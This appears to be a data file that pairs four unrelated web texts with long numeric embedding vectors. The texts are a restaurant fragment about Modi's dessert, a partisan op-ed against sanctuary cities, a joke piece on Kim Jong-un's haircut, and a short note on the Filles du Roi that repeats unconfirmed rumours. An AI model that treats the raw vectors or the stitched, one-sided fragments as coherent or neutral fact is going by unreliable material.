urban orchard. While the majority of food in Mexico travels on average some 2,500 km from origin to plate, at Quintonil much of it is picked on a daily basis and travels just 30 metres."Foodies waiting to see if Swarup would tweet what dessert PM Modi had, would have been disappointed, because Swarup didn't. If one were to guess, Modi might just have opted for something a little familiar from the dessert menu: Chikoo Pannacotta with Sweetened Corn Crumble and Chikoo Ice Cream.After all, Modi did say - in a nod to Mexico's son Octavio Paz - "I can understand what it means to be Mexican, because I am Indian".
[ -0.03125697746872902, 0.03357681259512901, -0.017896290868520737, 0.003538003657013178, 0.009016279131174088, -0.09282658994197845, 0.07509104162454605, -0.017921706661581993, 0.024283738806843758, -0.04369229078292847, 0.06625206768512726, -0.10422497242689133, 0.05224160477519035, 0.04524306580424309, 0.03592706471681595, -0.048909544944763184, 0.13653112947940826, -0.0399809256196022, -0.011404521763324738, 0.012738709338009357, 0.017525922507047653, 0.01881730929017067, 0.042352344840765, -0.03276657313108444, -0.02027108706533909, -0.0574343279004097, 0.03621361032128334, -0.06652123481035233, -0.024588700383901596, 0.004019039683043957, 0.008671688847243786, 0.03846853971481323, -0.1129208654165268, -0.01967017725110054, -0.05997403338551521, 0.01088718231767416, -0.00255833612754941, -0.007032127119600773, 0.05542837828397751, -0.07872126251459122, -0.010020260699093342, -0.06894395500421524, 0.03200674429535866, -0.03526262938976288, 0.06238193437457085, -0.05304928123950958, -0.003381598275154829, -0.0040380521677434444, -0.02715466171503067, -0.06847701221704483, -0.01406420674175024, -0.012651577591896057, 0.06641776859760284, -0.06267578899860382, 0.056890781968832016, -0.026252511888742447, -0.047070469707250595, -0.06456564366817474, 0.03697936236858368, 0.11214902251958847, 0.04465541988611221, 0.016596637666225433, -0.03480324521660805, 0.0234123095870018, 0.05548804625868797, -0.09220170229673386, 0.017524486407637596, 0.032615888863801956, -0.04309060052037239, -0.039272744208574295, 0.07338274270296097, -0.032622698694467545, 0.08668993413448334, 0.018291974440217018, -0.05187235772609711, 0.0031587861012667418, 0.1275544911623001, 0.09481648355722427, -0.03236006945371628, -0.04565265774726868, -0.008638559840619564, 0.07754256576299667, 0.0929938331246376, -0.050436776131391525, 0.033491600304841995, 0.026868809014558792, -0.037010811269283295, -0.02448909543454647, -0.022125938907265663, 0.023934777826070786, 0.07929530739784241, 0.07220803201198578, 0.017857739701867104, -0.003541290760040283, -0.00721590593457222, -0.059980906546115875, -0.06286902725696564, -0.019497273489832878, -0.06706788390874863, 0.10172361880540848, 0.018777132034301758, 0.06375854462385178, -0.06577036529779434, 0.015272365882992744, -0.0493207648396492, 0.016627315431833267, -0.019571492448449135, 0.03409615159034729, 0.03281140327453613, 0.06027017533779144, -0.059377580881118774, 0.06667263805866241, -0.030119072645902634, 0.0047890907153487206, -0.06479740887880325, 0.002033015713095665, -0.05351661145687103, 0.010275373235344887, 0.07471763342618942, -0.07889595627784729, -0.0704476535320282, 0.04432303458452225, -0.12226471304893494, -0.014451662078499794, 0.04244907945394516, -0.022784464061260223, 0.009105646051466465, 7.448618401637306e-33, -0.015035990625619888, 0.03244444727897644, 0.03971899300813675, 0.016517221927642822, 0.05089297145605087, 0.03762028366327286, -0.07051212340593338, -0.015703339129686356, -0.016912993043661118, -0.012824034318327904, -0.05332515761256218, -0.05180945619940758, -0.029300032183527946, 0.032251037657260895, -0.015742730349302292, 0.005887975916266441, -0.10505294054746628, -0.027306141331791878, 0.06630224734544754, -0.059113819152116776, -0.003194350516423583, -0.0050849299877882, 0.07724282145500183, 0.02692713961005211, -0.02069631963968277, 0.03475935757160187, 0.003487702226266265, -0.06668916344642639, 0.0038033013697713614, 0.02274504117667675, -0.02213604561984539, 0.0028230776078999043, -0.028024250641465187, 0.057760193943977356, -0.05387946590781212, -0.037807758897542953, 0.05174653232097626, -0.09557440876960754, -0.12905362248420715, 0.03329228609800339, -0.014772273600101471, 0.10974625498056412, -0.07180525362491608, 0.006614514160901308, -0.06560470908880234, 0.017779739573597908, 0.06004955992102623, 0.09342173486948013, -0.02122078277170658, -0.01871625892817974, -0.04057583212852478, 0.038186997175216675, 0.08241775631904602, -0.0722147673368454, -0.09646099805831909, 0.01167361717671156, 0.04898051172494888, -0.02729862928390503, 0.061735935509204865, -0.01235246378928423, -0.04276652634143829, 0.014311600476503372, -0.07892900705337524, 0.038038499653339386, -0.05518755316734314, 0.08000174909830093, -0.03651615232229233, -0.08937094360589981, 0.0725703239440918, 0.014569134451448917, 0.02165083959698677, 0.00994032435119152, -0.027666084468364716, 0.01526899915188551, -0.02159285731613636, -0.03188579902052879, -0.025501463562250137, -0.007871770299971104, 0.042759381234645844, 0.03653271123766899, 0.029577838256955147, 0.05808887258172035, 0.0568685308098793, -0.06909441202878952, 0.03539372980594635, 0.0705186277627945, -0.0036401504185050726, -0.0666508823633194, 0.1109541729092598, 0.07862285524606705, -0.011000961065292358, 0.030888646841049194, 0.0538155697286129, -0.011785835959017277, -0.03895404189825058, -7.769440197335479e-33, -0.03320423141121864, -0.009314781054854393, -0.07423187047243118, 0.028012970462441444, 0.05261263623833656, -0.019294584169983864, -0.033093661069869995, -0.05651843175292015, 0.048402659595012665, -0.12357766181230545, 0.05968416482210159, 0.03497278317809105, 0.07195859402418137, 0.02951740100979805, -0.04553447663784027, 0.06086431443691254, 0.02638176456093788, 0.029534121975302696, -0.07402200251817703, -0.022913791239261627, -0.04883088916540146, 0.04489956796169281, -0.024895351380109787, 0.030193446204066277, 0.006568104028701782, 0.030291613191366196, 0.03504624962806702, 0.033600516617298126, -0.03302180767059326, -0.10097096115350723, -0.00009972530097002164, -0.0388709120452404, -0.03681457042694092, 0.02432423084974289, 0.004227945581078529, 0.09428700059652328, -0.06751339882612228, 0.028816472738981247, 0.014150405302643776, 0.11899948120117188, -0.03499816730618477, 0.040355950593948364, -0.04531806334853172, 0.04541189968585968, -0.07630925625562668, -0.0031199653167277575, -0.03989866003394127, -0.07312733680009842, -0.07733128219842911, -0.02453882247209549, 0.0312421265989542, -0.01991075836122036, -0.0037230609450489283, -0.013915661722421646, 0.019593851640820503, 0.02136024460196495, 0.028188975527882576, 0.02191094495356083, 0.034261107444763184, -0.05654848739504814, -0.020106114447116852, 0.07375189661979675, 0.03522215038537979, -0.034285202622413635, 0.06208790838718414, -0.0034490490797907114, 0.042409658432006836, -0.028748515993356705, 0.10959332436323166, -0.01795346289873123, 0.03638889640569687, -0.02109377086162567, -0.05562677979469299, -0.030546123161911964, -0.01838688924908638, 0.006630593910813332, 0.005453524179756641, -0.02322356402873993, -0.00939343124628067, -0.059202343225479126, -0.013973546214401722, -0.015820736065506935, 0.021181058138608932, -0.04804642125964165, 0.017056886106729507, 0.054959431290626526, 0.03581271320581436, 0.015417308546602726, 0.135445237159729, 0.08150355517864227, 0.016542140394449234, -0.006313018500804901, -0.018030183389782906, 0.02354549430310726, 0.07663647830486298, -6.371698191287578e-8, 0.04750068858265877, -0.08544592559337616, -0.11303584277629852, 0.0410643070936203, 0.032708197832107544, 0.002806643024086952, -0.03950957581400871, -0.0890258178114891, 0.03659729287028313, 0.08368925750255585, 0.060323961079120636, 0.05559506267309189, -0.05704711005091667, -0.023663783445954323, -0.05021807178854942, 0.02936534956097603, 0.06372832506895065, 0.055722277611494064, -0.05867305025458336, 0.016184354200959206, -0.021161669865250587, 0.04298548027873039, 0.018238648772239685, -0.020647680386900902, 0.05759071931242943, -0.05921882018446922, -0.12158917635679245, 0.00256871129386127, 0.03986731171607971, -0.007758192252367735, -0.12517088651657104, 0.005075006280094385, -0.07005119323730469, -0.09919008612632751, -0.016223328188061714, 0.06987454742193222, 0.009548096917569637, -0.006988330744206905, 0.09956812113523483, -0.046973880380392075, -0.05010669305920601, -0.020367804914712906, -0.023076241835951805, 0.019982021301984787, -0.08003802597522736, -0.01199356745928526, -0.038560472428798676, 0.004581952467560768, -0.020022211596369743, -0.022762535139918327, -0.07725431770086288, -0.01229810155928135, 0.041776638478040695, 0.02612115442752838, -0.009076098911464214, -0.021093370392918587, -0.0836179107427597, -0.009900782257318497, 0.0589650422334671, -0.01911819912493229, 0.04069146886467934, -0.03924117609858513, -0.03230515494942665, -0.05078649893403053 ]
Editor’s Note: This Op-Ed was written and submitted to Breitbart Texas by Texas Attorney General Ken Paxton Politics has a nasty habit of trumping good policy. In the case of so-called sanctuary cities, it also manages to overwhelm our otherwise well-honed commitment to the rule of law. Next year, Travis County will welcome a new sheriff, Sally Hernandez, into office. The sheriff-elect has taken a careless stance on immigration in that she has fervently and publically rebuked her predecessor’s policy of cooperating with the U.S. Immigration and Customs Enforcement, or ICE, when it requested that the sheriff’s office hold inmates so that they might be removed from the country. Were we to take the sheriff-elect’s campaign promises at face value, Austin would be the first Texas municipality to fully qualify as a “sanctuary city.” The sheriff-elect defends her radical departure of existing law by attempting to wrap immigration enforcement in a swath of social justice causes. She doesn’t think, for instance, that “you solve the criminal justice process by deporting them.” Likewise, she calls ICE’s policies “discriminatory” and has urged for a more “progressive” approach to “treat everybody fairly and equally.” Never mind that ICE’s current deportation standards originated in the Obama Administration which, at least since 2011, has chiefly focused its enforcement effort at undocumented immigrants convicted of the most violent and heinous crimes. Popular attacks aside, the government has little interest in breaking up families; nor do they seek to deport victims who bring incidents of misconduct to the attention of authorities. Hernandez’s reasoning is one of ideology, not facts. It advances a narrative that lauds the appearance of compassion towards immigrants but never truly confronts the policy’s substance or how non-compliance can hurt the very audience that sanctuary cities are said to help. Had Hernandez done so, she would have realized that sanctuary cities are the policy equivalent of a dead end. Nothing moves forward. Not public safety. Not the rule of law. Certainly not the men, women, and children who thirst for the American Dream but have had the forbearance to pursue it through appropriate means. Indeed, our nation enjoys a proud history of lawful immigration. You might even call it our country’s cultural backbone. And you would be hard pressed to find a constituency on either side of the political aisle who wants that tradition to stop. Sanctuary cities, however, implicate different concerns. Exit polls in the last presidential race showed that President-elect Trump won a higher percentage of the Hispanic vote than the Republican Party’s two previous nominees. He secured that margin even though the experts had anticipated that his rhetoric against sanctuary cities and illegal immigration would hobble him in the Hispanic community. The results are hardly a surprise when you actually take the time to learn about what matters to voters. According to that same exit poll, voters understood that lawlessness hurts immigrants who seek to enter the country legally since it makes it more difficult, more expensive, and more time-consuming to navigate the process. The United States is a generous nation, but policymakers are unlikely to widen the entranceway if the halls are already crowded. In addition, by cutting holes into the federal government’s enforcement fabric, sanctuary cities imperil public safety. Dangerous criminal elements now know that if deported, they have a safe place to land upon reentry—places like Denver, Seattle, New York City, Philadelphia, Austin. “Kate’s Law,” named for murder victim Kate Steinle, mandates prison terms for those with multiple deportations and is a response to San Francisco’s sanctuary city policies, which fails to provide for the protection of its citizens. Even here in Texas, where sanctuary cities have yet to gain full traction, residents have suffered from repeat offenders able to exploit holes in our immigration laws. Nicodemo Coria-Gonzalez was deported multiple times, only to return and commit a series of rapes in the Austin area. He’s a prime example of the criminal element which will be emboldened by the sheriff-elect’s renegade policies. We cannot allow individuals to avoid justice and accountability. We cannot allow sanctuary cities to harbor these criminals. We cannot allow city officials to skirt the law at their whim. This upcoming session, the Texas Legislature will make ending sanctuary cities a top priority. Already, several bills have been filed to that effect, including S.B. 4, which would allow law enforcement to investigate a suspect’s immigration status as well as demand that municipalities implement immigration laws already on the books. Governor Greg Abbott has endorsed the sentiment behind these efforts, promising “to sign a law that bans sanctuary cities.” He also tweeted, “I’ve already issued an order cutting funding to sanctuary cities” in the meantime. Lt. Governor Dan Patrick has echoed with his own support: “No city in Texas should be allowed to ignore the law. We will end this practice once and for all this session.” Sanctuary cities argue for keeping illegal immigrant families together, yet they ignore that Kate Steinle’s family is forever shattered. Americans overwhelmingly understand that one of our first duties as a nation is to protect our citizens. It is time that the sheriff-elect and other local officials in Texas learn the same lesson.
[ -0.0031172565650194883, -0.004248285200446844, 0.041124872863292694, 0.027991728857159615, 0.029485352337360382, -0.04572401940822601, -0.027734918519854546, -0.03761465102434158, -0.02448406256735325, 0.018866445869207382, 0.009550211951136589, 0.014169441536068916, 0.08185819536447525, -0.04203540086746216, 0.013852160423994064, 0.06840667128562927, 0.018856005743145943, 0.03126170113682747, 0.022032560780644417, 0.05154126510024071, -0.015067986212670803, -0.04078179597854614, -0.04717416316270828, -0.01679586060345173, -0.07246030867099762, 0.0525948703289032, -0.01386892981827259, -0.07415130734443665, -0.07895262539386749, 0.03742304444313049, 0.00821427721530199, -0.019234148785471916, 0.060166120529174805, 0.023822417482733727, 0.009030720219016075, 0.028904365375638008, 0.10998253524303436, -0.027439817786216736, -0.001878399052657187, 0.03437695652246475, 0.011823862791061401, -0.0592322014272213, -0.002198557136580348, 0.017809292301535606, -0.0723523274064064, -0.1407930999994278, 0.033961839973926544, -0.04101777449250221, -0.00967576913535595, -0.13283289968967438, 0.006045320071280003, 0.0444767139852047, -0.020878830924630165, 0.033805184066295624, -0.00713350810110569, -0.03319418430328369, 0.02529795654118061, 0.07951018959283829, 0.01861068420112133, 0.010386481881141663, 0.0493374764919281, 0.07883230596780777, 0.0016207072185352445, 0.059281472116708755, -0.027132578194141388, -0.03909330442547798, -0.06299459934234619, -0.055552590638399124, 0.055628448724746704, -0.03641572222113609, 0.055914077907800674, -0.004763083532452583, 0.013114040717482567, -0.030236946418881416, 0.041982267051935196, 0.03132767230272293, 0.01331756915897131, 0.09462139755487442, 0.06377346813678741, -0.029830630868673325, 0.021099118515849113, -0.05563882365822792, -0.024062922224402428, -0.05257458612322807, -0.08182793110609055, -0.030322249978780746, -0.06936012208461761, -0.06485205143690109, -0.0020970371551811695, 0.00794580951333046, 0.059446271508932114, 0.047758471220731735, 0.016528569161891937, -0.07312613725662231, -0.0067612119019031525, -0.005077532958239317, 0.048498038202524185, 0.05298706516623497, -0.057919327169656754, 0.07231172919273376, -0.010510468855500221, -0.007899927906692028, -0.05625707656145096, -0.052301760762929916, 0.09187116473913193, -0.044482987374067307, -0.04201750457286835, -0.07202369719743729, -0.07150031626224518, 0.018924443051218987, 0.0946558266878128, -0.03810086101293564, -0.0577852688729763, 0.06995338946580887, 0.054358769208192825, 0.09969117492437363, -0.04327742010354996, 0.016721507534384727, 0.010937231592833996, -0.0069720386527478695, 0.05211866647005081, 0.020623400807380676, -0.07601595669984818, -0.02558005414903164, 0.06312815845012665, 0.0069005186669528484, 0.0171430092304945, 3.0972968406701986e-33, -0.048205357044935226, -0.021607059985399246, -0.05890984088182449, -0.036628808826208115, 0.04760173708200455, -0.026990044862031937, -0.035375919193029404, 0.01565706357359886, 0.018524808809161186, 0.05812952294945717, 0.0006633719312958419, 0.052517399191856384, 0.04088297858834267, -0.033024776726961136, 0.006106212269514799, 0.018694372847676277, -0.10202071070671082, -0.03402845561504364, 0.042443327605724335, 0.031771592795848846, 0.10659462958574295, -0.03887901082634926, -0.04437943175435066, 0.04107208922505379, -0.044394444674253464, 0.023663051426410675, 0.009517484344542027, -0.07881602644920349, 0.012341084890067577, 0.036554768681526184, -0.16056343913078308, 0.00051112164510414, 0.1253107190132141, -0.0004569902957882732, 0.0445035882294178, -0.015535485930740833, 0.07189031690359116, -0.01726301573216915, -0.08668962866067886, -0.051104482263326645, -0.07887427508831024, 0.05819648876786232, 0.04550418630242348, 0.06366457045078278, 0.030613413080573082, 0.008769623935222626, -0.010527078062295914, -0.0009472109377384186, -0.025491060689091682, -0.0011058042291551828, 0.07805035263299942, -0.06031493470072746, 0.01413479633629322, 0.009211396798491478, -0.03345958888530731, 0.007049695588648319, -0.0061862836591899395, 0.04696248844265938, 0.08657757192850113, 0.039018694311380386, 0.03864669427275658, 0.007078308612108231, 0.017378658056259155, 0.02487620897591114, 0.06869043409824371, -0.05980869382619858, 0.0028144842945039272, 0.07001088559627533, 0.011766416020691395, 0.0014107046881690621, 0.032880380749702454, 0.08197557181119919, 0.01991896703839302, 0.017580613493919373, -0.09811380505561829, -0.004794824402779341, 0.04817504435777664, 0.01773233339190483, 0.019823351874947548, -0.03474567085504532, -0.009739713743329048, -0.015271731652319431, -0.05295536294579506, 0.021948376670479774, 0.016109183430671692, -0.004714724607765675, -0.004529859870672226, -0.0020788332913070917, -0.0011529852636158466, 0.020717089995741844, 0.040144409984350204, 0.0541551411151886, 0.028049426153302193, -0.017441047355532646, -0.02678929641842842, -4.6896820997215335e-33, 0.005752849392592907, -0.10946263372898102, -0.01571049354970455, -0.051642052829265594, -0.05004459619522095, 0.013015985488891602, 0.024138489738106728, -0.02186264656484127, 0.09257923066616058, -0.07809525728225708, -0.06885923445224762, -0.05335787311196327, 0.08310447633266449, 0.03205076977610588, -0.06753773242235184, 0.0173050407320261, -0.020987514406442642, -0.021715400740504265, -0.09240210056304932, 0.05731257423758507, -0.047404613345861435, -0.0008124382584355772, -0.0469103641808033, 0.10233481228351593, -0.017984161153435707, -0.02261858992278576, 0.007407900877296925, -0.05355377495288849, -0.06673935055732727, 0.020426234230399132, -0.046853166073560715, -0.07064976543188095, -0.05488945171236992, 0.041642725467681885, -0.10018105059862137, 0.059351686388254166, 0.05708840861916542, -0.04947110265493393, 0.019772067666053772, 0.03665194660425186, -0.005143778398633003, -0.010780601762235165, -0.041241344064474106, 0.05610550940036774, -0.06569956988096237, 0.0757761225104332, 0.016814671456813812, 0.06871006637811661, -0.034737471491098404, -0.06238504871726036, -0.05460377410054207, -0.0025662847328931093, -0.11717953532934189, 0.06322768330574036, -0.043695081025362015, 0.014302849769592285, 0.005878371652215719, 0.04600254073739052, 0.006570231635123491, 0.04089159891009331, -0.01017982792109251, 0.04751233756542206, -0.0028444447088986635, 0.010967079550027847, 0.05800194293260574, -0.010906584560871124, -0.06356018781661987, -0.0293120127171278, 0.005553420167416334, 0.01004863902926445, 0.09387487918138504, -0.07175866514444351, -0.09984526038169861, -0.010245314799249172, 0.029351186007261276, 0.03296343609690666, 0.03589009493589401, -0.0642000138759613, -0.06889069825410843, 0.06544017791748047, 0.04712923616170883, -0.021833747625350952, -0.07680023461580276, -0.0342387817800045, 0.042415957897901535, 0.022558040916919708, 0.04702949896454811, -0.009264597669243813, 0.033946018666028976, 0.07852309942245483, -0.09253022819757462, 0.012745651416480541, -0.09676536917686462, -0.031467750668525696, -0.015507914125919342, -5.6059953124076856e-8, -0.04467799514532089, -0.0030173452105373144, -0.06654184311628342, 0.06515374779701233, 0.03927837684750557, 0.07089293748140335, -0.09216812252998352, -0.003525195177644491, -0.04694009944796562, -0.02672928012907505, 0.07828888297080994, -0.009564559906721115, -0.12347729504108429, -0.03480195626616478, -0.009432812221348286, 0.03816232457756996, 0.08324352651834488, 0.05629965662956238, -0.03068878874182701, 0.009526385925710201, -0.08432701975107193, -0.01727192848920822, -0.054805122315883636, -0.06330341845750809, -0.0007826442597433925, -0.02386569231748581, -0.06952378153800964, 0.010341286659240723, 0.11321930587291718, 0.10565709322690964, -0.045462097972631454, 0.009697280824184418, -0.09882891923189163, 0.02275010384619236, 0.03339684382081032, -0.03664035722613335, -0.0053391107358038425, 0.047828271985054016, 0.0353834442794323, -0.0310478825122118, -0.04300037771463394, 0.04595036432147026, -0.07782850414514542, -0.016860777512192726, -0.05222909152507782, -0.016068972647190094, -0.02805248089134693, 0.07122340053319931, 0.1296701729297638, 0.045554012060165405, 0.024043872952461243, -0.14354103803634644, -0.017833705991506577, 0.022289039567112923, 0.10081007331609726, -0.043728820979595184, -0.010402200743556023, -0.016090555116534233, 0.007695460692048073, -0.0003636081237345934, -0.03998182713985443, 0.031817276030778885, 0.11265304684638977, 0.013709218241274357 ]
Kim Jong-un, child god-king of North Korea, has a new haircut intended to connect him to his grandfather, Kim Il-sung. It’s quite the barber’s trick, some kind of upside-down trapezoid that proudly defies the laws of physics. High brow: A year apart – Kim Jong Un in early 2014 and now #NorthKorea pic.twitter.com/AOTKrrNiih — Frank Feinśtein (@frankfeinstein) February 19, 2015 That’s not the only new cosmetic upkeep to grace the tyrant’s head—he now sports half-shaved eyebrows. Who knows why? The Guardian calls it “a fine example of fashion’s current love of gender-neutral style.” Ki Lee, founder and creative director of a London salon called Hurwundekei, told the Guardian that the new ‘do is possible with the tag-teaming efforts of perm and wax. “It’s not too easy to do on Asian hair, but we get a lot of people coming into the salon requesting this sort of volume,” Lee said. Lee added that the hairstyle will require a new perm every few months, if it’s to be maintained. Of course, in the mean time, the Internet is having a heyday: (Sorry, this embed was not found.) Who wore it better? RT @Justin_Ling In other news, Kim Jong Un has a new haircut http://t.co/ZdVEXP3sD1 pic.twitter.com/uxLBkIzsgP — Robyn Urback (@RobynUrback) February 19, 2015 Kim Jong Un has a new haircut and now he looks like Guile from Street Fighter http://t.co/Utnt6ZieLw pic.twitter.com/tlUalqxjhd — Zack Beauchamp (@zackbeauchamp) February 19, 2015 Via @reddit: How would Obama look in a Kim Jong-un haircut http://t.co/l8Jp6bwG0d pic.twitter.com/5HhyRsxU0M — Sachin Kalbag (@SachinKalbag) February 20, 2015 Enlarged Meeting of Political Bureau of C.C., WPK Held under Guidance of Kim Jong Un http://t.co/sCLIBL57WG pic.twitter.com/dte6KS012G — KCNA Watch (@KCNAWatch) February 19, 2015 H/T Guardian | Image via @frankfeinstein/Twitter
[ -0.06467946618795395, 0.088636115193367, 0.04724857956171036, -0.0248562041670084, -0.04516218602657318, -0.06090715527534485, 0.04958093538880348, -0.06170419976115227, -0.08380614221096039, 0.03047989495098591, 0.06779548525810242, -0.027061905711889267, -0.0031068807002156973, -0.059782955795526505, 0.07965268194675446, 0.0593186654150486, -0.023464497178792953, 0.028369609266519547, -0.051255129277706146, -0.0031226081773638725, 0.0006962365587241948, -0.09686741232872009, 0.05020167678594589, -0.006665269378572702, -0.036762602627277374, -0.09268353879451752, 0.041807107627391815, -0.01729237101972103, 0.00756085617467761, -0.08989853411912918, 0.017807550728321075, 0.00038335894350893795, -0.02450140379369259, 0.006884968839585781, -0.02529161050915718, 0.03598087653517723, 0.012117713689804077, 0.10663142800331116, -0.03742906078696251, 0.02850165404379368, -0.03031737357378006, -0.06552492827177048, -0.06950031965970993, -0.04343342036008835, 0.06630280613899231, -0.0028145136311650276, 0.012545907869935036, -0.07539036124944687, -0.1074175089597702, 0.016631068661808968, 0.009052732959389687, -0.1070299744606018, 0.05039885640144348, -0.009950625710189342, -0.008695639669895172, 0.058650411665439606, -0.03826635330915451, 0.03986959531903267, 0.06165216863155365, 0.04023708403110504, -0.025266923010349274, -0.03427339345216751, -0.04731475189328194, -0.0027741186786442995, 0.00940734799951315, -0.03897693008184433, 0.059286098927259445, -0.05040093511343002, 0.020861348137259483, -0.01908860169351101, 0.030480297282338142, -0.0417916402220726, -0.014846456237137318, 0.043272651731967926, -0.06756362318992615, -0.0006354137440212071, 0.05404976010322571, 0.02839275822043419, -0.03180116415023804, -0.036887817084789276, 0.018060246482491493, 0.026380877941846848, 0.054922036826610565, 0.025098532438278198, -0.040890008211135864, 0.01353529654443264, -0.11894486099481583, -0.08820478618144989, -0.08308807015419006, 0.07180320471525192, -0.030761143192648888, 0.08915195614099503, 0.04377664253115654, -0.04198412969708443, 0.07488887012004852, 0.018051404505968094, -0.08000947535037994, 0.091054767370224, 0.009925353340804577, 0.050583891570568085, 0.003323775250464678, 0.01978517509996891, -0.013091932982206345, -0.01619068905711174, -0.06776293367147446, -0.1217179223895073, 0.01968505047261715, 0.015467573888599873, -0.024121077731251717, 0.020237736403942108, -0.015059697441756725, -0.006466638296842575, -0.03028343804180622, -0.05962427332997322, 0.03379876911640167, -0.08685007691383362, 0.031961072236299515, -0.07445389032363892, 0.012143821455538273, 0.01984662003815174, -0.010582657530903816, 0.06691133230924606, -0.07605031877756119, -0.05968248471617699, -0.02334134466946125, 0.0012070805532857776, -0.020858295261859894, 5.109460224114292e-34, 0.09431430697441101, 0.11856473982334137, 0.031527433544397354, -0.0030674487352371216, -0.05927439033985138, 0.10555285960435867, -0.028291359543800354, -0.03239131718873978, -0.06708145141601562, -0.005142664536833763, -0.05141925439238548, -0.017384443432092667, -0.08861637115478516, -0.05119466781616211, -0.03592967987060547, 0.021783879026770592, 0.038561172783374786, 0.02383197657763958, 0.0002094333030981943, 0.023805713281035423, 0.04007706791162491, 0.08116529136896133, -0.009731774218380451, -0.09437752515077591, 0.02167588286101818, 0.031753066927194595, 0.02964184060692787, -0.07030338793992996, -0.007209325674921274, 0.042581845074892044, -0.014356271363794804, 0.024575551971793175, 0.012387322261929512, -0.008947405964136124, -0.07023628056049347, -0.0017309965332970023, 0.012904779054224491, -0.02646268531680107, -0.01369920652359724, 0.04630493372678757, -0.0005896560032851994, 0.023029295727610588, 0.014259826391935349, 0.04874725639820099, -0.07330510020256042, 0.04874654486775398, -0.016827017068862915, 0.006772050634026527, -0.03379666432738304, 0.008900292217731476, 0.04167187213897705, 0.024587657302618027, 0.03144459053874016, 0.009796117432415485, 0.07602477818727493, -0.034362439066171646, -0.016528604552149773, -0.08261487632989883, 0.030546437948942184, -0.0009590673143975437, 0.04073584824800491, 0.032260745763778687, -0.06913749128580093, 0.0749112069606781, -0.010839276015758514, -0.0371774286031723, 0.03456581383943558, 0.10396585613489151, -0.09230199456214905, -0.058143001049757004, -0.011543252505362034, 0.03179732337594032, -0.06903499364852905, -0.059110768139362335, -0.021440302953124046, -0.046967774629592896, -0.04356304183602333, 0.00903400033712387, 0.04011429101228714, 0.080162413418293, 0.013357912190258503, 0.07831256836652756, 0.030981866642832756, -0.06592810899019241, 0.07621973752975464, -0.05016377195715904, 0.00013376478455029428, -0.0204430241137743, 0.012407816015183926, 0.021103790029883385, -0.001042398507706821, -0.03959546610713005, 0.001139734755270183, 0.025745000690221786, -0.05655120313167572, -3.442215903218244e-33, 0.00353098101913929, -0.02393907681107521, 0.00646307272836566, 0.09170462191104889, 0.08466443419456482, 0.06977222859859467, 0.04681500047445297, 0.013578754849731922, -0.024744898080825806, -0.028968684375286102, 0.058452311903238297, -0.05338051915168762, 0.01552388072013855, -0.007324319798499346, 0.03166794031858444, -0.03119131177663803, -0.01855076476931572, 0.07265284657478333, -0.027221856638789177, 0.035770948976278305, 0.060153331607580185, 0.008156897500157356, -0.018759453669190407, 0.032467249780893326, -0.13390326499938965, 0.03931158781051636, 0.04188072308897972, -0.006914891768246889, -0.0006604371010325849, 0.13791394233703613, 0.00528534734621644, -0.028231903910636902, -0.04215308278799057, 0.048497166484594345, -0.017964079976081848, -0.009140619076788425, -0.14839762449264526, 0.05139797180891037, 0.03896817937493324, -0.03773825988173485, 0.010076135396957397, -0.0684310644865036, 0.05041320621967316, 0.004957916215062141, 0.00719533720985055, -0.048780448734760284, -0.03294593095779419, -0.0011421563103795052, -0.050166986882686615, -0.04993697255849838, -0.0513923354446888, -0.0031230112072080374, 0.014881657436490059, 0.02662418782711029, -0.0531606562435627, 0.010436530224978924, -0.0622447207570076, -0.02227524295449257, 0.014803728088736534, 0.04854198917746544, -0.029098542407155037, -0.07258064299821854, -0.013776054605841637, 0.05389794707298279, -0.08335456252098083, 0.020632527768611908, 0.1249832883477211, -0.044938404113054276, 0.06678415834903717, -0.08260618150234222, 0.04946698620915413, -0.015951229259371758, -0.008615599945187569, -0.0387936569750309, -0.048984136432409286, 0.04032253473997116, 0.05888223648071289, 0.05717899277806282, 0.024988869205117226, 0.03385685011744499, -0.045864664018154144, -0.0025467427913099527, -0.03394765406847, 0.006336424965411425, 0.07514125108718872, 0.04095631092786789, -0.037787411361932755, 0.01821054331958294, 0.006110053975135088, -0.05531090870499611, -0.051195841282606125, 0.025709621608257294, -0.10292308032512665, 0.021869855001568794, -0.0016053200233727694, -5.3976453529003265e-8, 0.023516543209552765, 0.0026894414331763983, 0.06826826930046082, 0.04625759273767471, 0.03895040974020958, 0.035241857171058655, -0.04489774629473686, -0.11318433284759521, -0.037065040320158005, 0.0404997318983078, 0.041483767330646515, 0.11296086013317108, 0.010385884903371334, 0.0308516938239336, 0.015029378235340118, -0.06325934827327728, 0.09149939566850662, 0.10279463231563568, -0.006083184853196144, 0.0036608853843063116, -0.11203037947416306, 0.01328689232468605, 0.06653963774442673, -0.029027968645095825, 0.008233710192143917, 0.0016459173057228327, -0.06584174931049347, 0.05720663070678711, -0.005396787542849779, 0.06461379677057266, 0.010283323004841805, 0.005580211989581585, -0.10767851024866104, 0.03636578842997551, 0.01782713271677494, -0.06906043738126755, -0.01644882746040821, -0.0161298718303442, -0.008298348635435104, -0.06790605187416077, -0.0031317053362727165, -0.02406936325132847, 0.07904598861932755, 0.06960652023553848, -0.019544238224625587, -0.09883283823728561, 0.08454396575689316, -0.04077911749482155, -0.03905496373772621, 0.1301528960466385, -0.028718074783682823, -0.04673488810658455, 0.008243240416049957, 0.0029293964616954327, 0.04259568080306053, 0.03336616978049278, 0.06446146965026855, 0.010035433806478977, -0.10031522065401077, 0.051340360194444656, 0.06771096587181091, -0.12451975792646408, -0.05161189287900925, 0.005590891931205988 ]
The Filles du Roi or the King’s Daughters were some 770 women who moved from France to Quebec from 1663 and 1673. The idea was to help populate the French colonies which were mostly male and not as populated as the British Colonies. The girls came with a dowry and were encouraged to marry and give birth to as many children as possible. There are two constant rumors with the girls. The first is that the King encouraged the orphans and prostitutes to move in efforts to clear France of that population. The second is that the prettiest girls got chosen in the first stop of Quebec City, the second prettiest in the second stop of Trois-Rivières and the third prettiest ended in Montreal. We cannot confirm or deny these rumors.
